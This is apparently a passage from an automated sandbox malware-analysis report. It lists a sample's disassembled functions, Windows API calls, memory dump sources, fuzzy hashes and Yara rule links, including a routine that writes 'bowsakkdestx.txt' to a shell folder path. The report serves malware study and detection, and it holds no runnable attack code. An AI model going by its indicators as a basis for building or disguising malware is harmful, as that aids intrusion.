                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCB6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BCB70B
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • _free.LIBCMT ref: 00BCB71E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                                                        • Opcode ID: f51247a2c8edf308c852c0373dc226d12569051d9f8dc410f9e72db864f6fa60
                                                                                                                                                                        • Instruction ID: b17f683c7907748ec1883d9ef00c4bae99b5dd4fed2150e25f9aacdad41a164b
                                                                                                                                                                        • Opcode Fuzzy Hash: f51247a2c8edf308c852c0373dc226d12569051d9f8dc410f9e72db864f6fa60
                                                                                                                                                                        • Instruction Fuzzy Hash: 14119132505715AFCB312FB4AC86FBE3AD8EF85361F1045AAFC59A6151DF708C409691
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAF070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00BAF085
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAF0AC
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAF0B6
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAF0C4
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00BAF0D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: fe2a593a4bd5e747066365b2ae262c78cba085728071784bb57315478cfb8323
                                                                                                                                                                        • Instruction ID: ed4abd93faa147ce185e07782f26213d2e2d0e4986e27c7fe4513cc18a2097b5
                                                                                                                                                                        • Opcode Fuzzy Hash: fe2a593a4bd5e747066365b2ae262c78cba085728071784bb57315478cfb8323
                                                                                                                                                                        • Instruction Fuzzy Hash: 730184356403096AEA309B54DC86FEE77A8E745B04F504051FA00AB1E3D7B5A545CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAE500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00BAE515
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAE53C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAE546
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAE554
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00BAE562
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 48720bd9f44441faab8d6f632bf6e615ebe20a020ef8b2048ec5016b95ad5939
                                                                                                                                                                        • Instruction ID: 1b637ffbefb5684ff91a2a0cf8276ed58ee2161d04d566b0bd8a76cd77afc020
                                                                                                                                                                        • Opcode Fuzzy Hash: 48720bd9f44441faab8d6f632bf6e615ebe20a020ef8b2048ec5016b95ad5939
                                                                                                                                                                        • Instruction Fuzzy Hash: 4301DB35B803497AEB209B54EC87FAE7BACE745B08F144051FA00BB1E2D6F9A545C7B4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAFA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00BAFA53
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFA71
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAFA7B
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFA89
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00BAFA94
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction ID: 202497c6d3a827972449d65d04f7797bd25dfcb68585105b00cfd013fc463e45
                                                                                                                                                                        • Opcode Fuzzy Hash: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 62018631B40309BBEB209B94DC8AFFA3BACEB45B41F544061FA04FE1D1D7F5A84586A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAFDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00BAFE03
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFE21
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAFE2B
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFE39
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00BAFE44
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction ID: 71c7da6749863d8d4aec46a25f95232d9fb3d50078d88e1bcb161b39bd73bf39
                                                                                                                                                                        • Opcode Fuzzy Hash: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 84018B317403097BEB205B95DC8AFEB3BACDB45B01F544051F600BF1E2D7F5984586A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE73F0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                        • String ID: $+$0123456789ABCDEF
                                                                                                                                                                        • API String ID: 1302938615-1400378107
                                                                                                                                                                        • Opcode ID: 796be5353c2a7e208fda4dc63d8dbf2231199cb74a4b8078db4acba760493d6b
                                                                                                                                                                        • Instruction ID: da8481e7a29a016beaf71f72868cdc7fae135cb03aa52e872deb200fc00853b5
                                                                                                                                                                        • Opcode Fuzzy Hash: 796be5353c2a7e208fda4dc63d8dbf2231199cb74a4b8078db4acba760493d6b
                                                                                                                                                                        • Instruction Fuzzy Hash: FE818EB1A087919FD710CF2A9840A2BBBE5FFD8744F150A9DF98997351D730ED018B92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA7BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 47d49fef4a5fad772f42d8c2d14a3e6cefa322e135f95f9409cfc8127d2cf5a9
                                                                                                                                                                        • Instruction ID: 4438dfc30597c28cfab0107905afe0a611595579ee8a3bd412c5860da0d895f3
                                                                                                                                                                        • Opcode Fuzzy Hash: 47d49fef4a5fad772f42d8c2d14a3e6cefa322e135f95f9409cfc8127d2cf5a9
                                                                                                                                                                        • Instruction Fuzzy Hash: 0851C37274C1049BDB24CF1CDC84A6A77E6EF86710B2489ADF846CB741EE31DD508BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA4160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: a00d2e0f40aae91326f75c83fd5fecd3aad41ed721c1da7d384a27763637f776
                                                                                                                                                                        • Instruction ID: e9a6aef1367425fc40ec05127a7b9d09724c274b9901f66b6891eb3ff1e1811a
                                                                                                                                                                        • Opcode Fuzzy Hash: a00d2e0f40aae91326f75c83fd5fecd3aad41ed721c1da7d384a27763637f776
                                                                                                                                                                        • Instruction Fuzzy Hash: BE310831318304ABDB24DF4CDC85A6AB7E6EBC27107204A9DF865DB781D7B1ED418BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BEAE30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                                                                                        • API String ID: 2102423945-294840303
                                                                                                                                                                        • Opcode ID: 7e91265532f984758bb8dcdad74962d21cfb593d8425b4c767b3d9257121fe7b
                                                                                                                                                                        • Instruction ID: bab24246bd942330b61373da5881190432dc55f359916d4603c04cda35c3bbad
                                                                                                                                                                        • Opcode Fuzzy Hash: 7e91265532f984758bb8dcdad74962d21cfb593d8425b4c767b3d9257121fe7b
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F21F2B6B002217FE2146A5DFC82B66B3D9EB84B14F208569F209DB281D3A0B85083D5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00B9C687
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                                                                                        • Opcode ID: 9623a6691c35bf6d15abb78f16647423be651b3f39a3e82eecad1edf91ce1eda
                                                                                                                                                                        • Instruction ID: b31bc040e8994c69fed4c652f94cecf4fbc603af026717225f2da118d879dbbe
                                                                                                                                                                        • Opcode Fuzzy Hash: 9623a6691c35bf6d15abb78f16647423be651b3f39a3e82eecad1edf91ce1eda
                                                                                                                                                                        • Instruction Fuzzy Hash: C021F976208305ABDB20DF28D844B9FBFE8EF81754F004AAEF485932A1D775D544C792
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C48B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C4A9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        • Opcode ID: 856f4826b319ead6c338ee6139b39732f6ac62aa7c329ab9f2c603daa2f0773e
                                                                                                                                                                        • Instruction ID: 4ed4fc43e27829c057d51ad414819b442745a3f1fc8b4b1d51bdbe9c2817e348
                                                                                                                                                                        • Opcode Fuzzy Hash: 856f4826b319ead6c338ee6139b39732f6ac62aa7c329ab9f2c603daa2f0773e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3801DB7268032837DE307A546C86FFF779C8B51B22F0000E6FE08D6241D5E1559687E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BABA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00BABA4A
                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00BABA73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
